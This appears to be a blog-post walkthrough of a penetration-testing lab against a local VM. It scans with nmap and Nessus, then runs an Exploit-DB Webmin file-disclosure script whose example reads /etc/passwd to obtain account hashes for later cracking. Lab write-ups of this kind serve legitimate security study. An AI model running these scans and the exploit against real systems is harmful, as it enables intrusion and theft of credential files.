- Search account which registered on server.
==> Scan with Nmap >>> # nmap -A -sn 192.168.56.0/24
Result:
- IP Target ==> 192.168.56.101
- Open Ports ==> 22 ; 80 ; 139 ; 445 ; 10000
Services Enumeration
==========================================================================
==========================================================================
With command == > # nmap -A 192.168.56.101
Result :
- Services which running on system ==> Openssh ; Apache ; Samba ; Webmin
- OS using linux 2.6.22
Using Nessus :
Possibility of Vulnerable :
- SSH ==> Port 22
- Samba ==> Port 445
- Webmin ==> Port 10000
Exploit/Pentest
Using exploitdb ==> multiple/remote/2017.pl
To running ==> Usage: platforms/multiple/remote/2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
To running ==> Usage: platforms/multiple/remote/2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
Result :
See the account which register on system but is still encrypted ==> Use John the ripper ==> On next section.
==========================================================================
No comments:
Post a Comment